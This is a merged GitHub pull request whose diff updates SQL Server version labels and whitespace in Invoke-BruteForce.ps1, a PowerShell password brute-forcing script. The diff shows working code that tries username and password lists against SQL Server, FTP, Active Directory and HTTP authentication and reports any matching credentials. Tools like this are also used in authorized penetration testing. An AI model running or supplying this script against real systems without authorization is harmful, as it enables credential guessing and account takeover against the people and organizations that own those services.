Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Update SQL Server version numbers #25

Merged
merged 1 commit into from
Oct 7, 2015
Merged

Update SQL Server version numbers #25

Changes from all commits
Commits
Show all changes
1 commit
Select commit
File filter

Filter by extension

Filter by extension
Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
57 changes: 29 additions & 28 deletions Scan/Invoke-BruteForce.ps1
View file
Open in desktop
Original file line number Diff line number Diff line change
@@ -1,5 +1,5 @@

function Invoke-BruteForce
function Invoke-BruteForce
{
<#
.SYNOPSIS
Expand Down Expand Up @@ -67,7 +67,7 @@ Goude 2012, TreuSec
$StopOnSuccess
)

Process
Process
{
$usernames = Get-Content $UserList
$passwords = Get-Content $PasswordList
Expand All @@ -84,26 +84,27 @@ Goude 2012, TreuSec
{
$success = $false
}
if($success -eq $true)
if($success -eq $true)
{
Write-Output "Match found! $username : $Password"
switch ($connection.ServerVersion) {
{ $_ -match "^6" } { "SQL Server 6.5";Break UsernameLoop }
{ $_ -match "^6" } { "SQL Server 7";Break UsernameLoop }
{ $_ -match "^7" } { "SQL Server 7";Break UsernameLoop }
{ $_ -match "^8" } { "SQL Server 2000";Break UsernameLoop }
{ $_ -match "^9" } { "SQL Server 2005";Break UsernameLoop }
{ $_ -match "^10\.00" } { "SQL Server 2008";Break UsernameLoop }
{ $_ -match "^10\.50" } { "SQL Server 2008 R2";Break UsernameLoop }
{ $_ -match "^11" } { "SQL Server 2012";Break UsernameLoop }
{ $_ -match "^12" } { "SQL Server 2014";Break UsernameLoop }
{ $_ -match "^13" } { "SQL Server 2016";Break UsernameLoop }
Default { "Unknown" }
}
}
}
}
if($service -eq "SQL")
if($service -eq "SQL")
{
Write-Output "Brute Forcing SQL Service on $ComputerName"
if($userList)
if($userList)
{
:UsernameLoop foreach ($username in $usernames)
{
Expand All @@ -114,24 +115,24 @@ Goude 2012, TreuSec
CheckForSQLSuccess
}
}
}
else
}
else
{
#If no username is provided, use trusted connection
$Connection.ConnectionString = "server=$identity;Initial Catalog=Master;trusted_connection=true;"
CheckForSQLSuccess

}
}
}

#Brute Force FTP
elseif ($service -eq "FTP")
{
if($ComputerName -notMatch "^ftp://")
if($ComputerName -notMatch "^ftp://")
{
$source = "ftp://" + $ComputerName
}
else
else
{
$source = $ComputerName
}
Expand All @@ -141,7 +142,7 @@ Goude 2012, TreuSec
{
foreach ($Password in $Passwords)
{
try
try
{
$ftpRequest = [System.Net.FtpWebRequest]::Create($source)
$ftpRequest.Method = [System.Net.WebRequestMethods+Ftp]::ListDirectoryDetails
Expand All @@ -157,52 +158,52 @@ Goude 2012, TreuSec
}
}

catch
catch
{
$message = $error[0].ToString()
$success = $false
}
}
}
}
}

#Brute Force Active Directory
elseif ($service -eq "ActiveDirectory")
elseif ($service -eq "ActiveDirectory")
{
Write-Output "Brute Forcing Active Directory $ComputerName"
Add-Type -AssemblyName System.DirectoryServices.AccountManagement
$contextType = [System.DirectoryServices.AccountManagement.ContextType]::Domain
Try
Try
{
$principalContext = New-Object System.DirectoryServices.AccountManagement.PrincipalContext($contextType, $ComputerName)
$success = $true
}
Catch
Catch
{
$message = "Unable to contact Domain"
$success = $false
}
if($success -ne $false)
if($success -ne $false)
{
:UsernameLoop foreach ($username in $usernames)
{
foreach ($Password in $Passwords)
{
Try
Try
{
Write-Verbose "Checking $userName : $password"
$success = $principalContext.ValidateCredentials($username, $password)
$message = "Password Match"
if ($success -eq $true)
{
Write-Output "Match found! $username : $Password"
Write-Output "Match found! $username : $Password"
if ($StopOnSuccess)
{
break UsernameLoop
}
}
}
Catch
Catch
{
$success = $false
$message = "Password doesn't match"
Expand All @@ -212,13 +213,13 @@ Goude 2012, TreuSec
}
}
#Brute Force Web
elseif ($service -eq "Web")
elseif ($service -eq "Web")
{
if ($ComputerName -notMatch "^(http|https)://")
{
$source = "http://" + $ComputerName
}
else
}
else
{
$source = $ComputerName
}
Expand All @@ -230,7 +231,7 @@ Goude 2012, TreuSec
$securePassword = ConvertTo-SecureString -AsPlainText -String $password -Force
$credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList $userName, $securePassword
$webClient.Credentials = $credential
Try
Try
{
Write-Verbose "Checking $userName : $password"
$source
Expand All @@ -239,14 +240,14 @@ Goude 2012, TreuSec
$success
if ($success -eq $true)
{
Write-Output "Match found! $Username : $Password"
Write-Output "Match found! $Username : $Password"
if ($StopOnSuccess)
{
break UsernameLoop
}
}
}
Catch
Catch
{
$success = $false
$message = "Password doesn't match"
Expand Down